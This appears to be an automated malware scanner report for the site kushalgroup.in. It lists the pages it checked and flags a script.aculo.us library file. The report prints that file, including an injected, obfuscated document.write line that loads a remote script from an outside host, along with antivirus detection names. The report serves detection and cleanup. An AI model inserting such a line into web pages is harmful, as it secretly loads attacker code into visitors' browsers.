New scan:

Malware Scanner report for kushalgroup.in

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://kushalgroup.in/gallery1.html
200 OK
Content-Length: 19864
Content-Type: text/html
clean
http://kushalgroup.in/gojs.js
404 Not Found
Content-Length: 324
Content-Type: text/html
clean
http://kushalgroup.in/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://kushalgroup.in/ajaxtabs.js
404 Not Found
Content-Length: 328
Content-Type: text/html
clean
http://kushalgroup.in/js/prototype.js
200 OK
Content-Length: 47723
Content-Type: application/javascript
clean
http://kushalgroup.in/js/scriptaculous.js?load=effects
200 OK
Content-Length: 2272
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Scriptaculous = {
Version: '1.5.1',
require: function(libraryName) {
document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
},
load: function() {
if((typeof Prototype=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototype.Version.split(".")[1]) < 1.4)
throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0");

... 197 bytes are skipped ...
h = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
var includes = s.src.match(/\?.*load=([a-z,]*)/);
(includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each(
function(include) { Scriptaculous.require(path+include+'.js') });
});
}
}
Scriptaculous.load();







document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

Antivirus reports:

AntiVir
HTML/Rce.Gen3
Avast
HTML:Script-inf
nProtect
Trojan.JS.Redirector.AEY
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Redirector.AEY (B)
McAfee-GW-Edition
JS/Redirector.o
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Gamburl.E
TotalDefense
JS/Redirector!generic
McAfee
JS/Redirector.o
NANO-Antivirus
Trojan.Url.IframeB.zwzsb
F-Secure
Trojan.JS.Redirector.AEY
F-Prot
HTML/Linker.U
Sophos
Mal/Badsrc-C
GData
Trojan.JS.Redirector.AEY
Commtouch
HTML/Linker.U
ESET-NOD32
HTML/ScrInject.B.Gen
BitDefender
Trojan.JS.Redirector.AEY

http://kushalgroup.in/js/lightbox.js
200 OK
Content-Length: 23501
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kushalgroup.in

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kushalgroup.in
Referer: http://www.google.com/search?q=kushalgroup.in

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kushalgroup.in

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kushalgroup.in/

Result: kushalgroup.in is not infected or malware details are not published yet.